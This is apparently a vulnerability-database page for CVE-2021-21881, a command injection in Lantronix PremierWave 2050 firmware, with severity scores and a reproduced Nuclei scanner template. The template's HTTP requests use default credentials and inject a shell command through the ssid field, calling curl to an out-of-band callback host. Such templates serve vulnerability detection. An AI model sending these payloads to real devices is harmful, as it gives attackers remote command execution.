Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2021-21881
HistoryJan 04, 2022 - 2:14 p.m.

Lantronix PremierWave 2050 8.9.0.0R4 - Remote Command Injection

2022-01-0414:14:12
ProjectDiscovery
github.com
4

9 High

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

SINGLE

Confidentiality Impact

COMPLETE

Integrity Impact

COMPLETE

Availability Impact

COMPLETE

AV:N/AC:L/Au:S/C:C/I:C/A:C

9.9 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

LOW

User Interaction

NONE

Scope

CHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H

9.7 High

AI Score

Confidence

High

0.971 High

EPSS

Percentile

99.8%

Lantronix PremierWave 2050 8.9.0.0R4 contains an OS command injection vulnerability. A specially-crafted HTTP request can lead to command in the Web Manager Wireless Network Scanner. An attacker can make an authenticated HTTP request to trigger this vulnerability.

id: CVE-2021-21881

info:
  name: Lantronix PremierWave 2050 8.9.0.0R4 - Remote Command Injection
  author: gy741
  severity: critical
  description: Lantronix PremierWave 2050 8.9.0.0R4 contains an OS command injection vulnerability. A specially-crafted HTTP request can lead to command in the Web Manager Wireless Network Scanner. An attacker can make an authenticated HTTP request to trigger this vulnerability.
  impact: |
    Successful exploitation of this vulnerability could lead to unauthorized access, data leakage, or complete compromise of the affected device.
  remediation: |
    Apply the latest firmware update provided by Lantronix to mitigate the vulnerability.
  reference:
    - https://talosintelligence.com/vulnerability_reports/TALOS-2021-1325
    - https://nvd.nist.gov/vuln/detail/CVE-2021-21881
    - https://github.com/ARPSyndicate/cvemon
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
    cvss-score: 9.9
    cve-id: CVE-2021-21881
    cwe-id: CWE-78
    epss-score: 0.97001
    epss-percentile: 0.99723
    cpe: cpe:2.3:o:lantronix:premierwave_2050_firmware:8.9.0.0:r4:*:*:*:*:*:*
  metadata:
    max-request: 2
    vendor: lantronix
    product: premierwave_2050_firmware
  tags: cve2021,cve,lantronix,rce,oast,cisco
variables:
  useragent: '{{rand_base(6)}}'

http:
  - raw:
      - |
        POST / HTTP/1.1
        Host: {{Hostname}}
        Authorization: Basic dXNlcjp1c2Vy
        Content-Type: application/x-www-form-urlencoded

        ajax=WLANScanSSID&iehack=&Scan=Scan&netnumber=1&2=link&3=3&ssid="'; curl http://{{interactsh-url}} -H 'User-Agent: {{useragent}}' #
      - |
        POST / HTTP/1.1
        Host: {{Hostname}}
        Authorization: Basic YWRtaW46UEFTUw==
        Content-Type: application/x-www-form-urlencoded

        ajax=WLANScanSSID&iehack=&Scan=Scan&netnumber=1&2=link&3=3&ssid="'; curl http://{{interactsh-url}} -H 'User-Agent: {{useragent}}'

    stop-at-first-match: true

    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol # Confirms the HTTP Interaction
        words:
          - "http"

      - type: word
        part: interactsh_request
        words:
          - "User-Agent: {{useragent}}"
# digest: 490a004630440220787afb24b4404fe795e842e2aaecd864176f0b281a8a029cc7f051d784b99d95022063b2263ccd44743fed77f74ab9037062e981c2179c736dd603756ff4753b1f46:922c64590222798bb761d5b6d8e72950

9 High

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

SINGLE

Confidentiality Impact

COMPLETE

Integrity Impact

COMPLETE

Availability Impact

COMPLETE

AV:N/AC:L/Au:S/C:C/I:C/A:C

9.9 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

LOW

User Interaction

NONE

Scope

CHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H

9.7 High

AI Score

Confidence

High

0.971 High

EPSS

Percentile

99.8%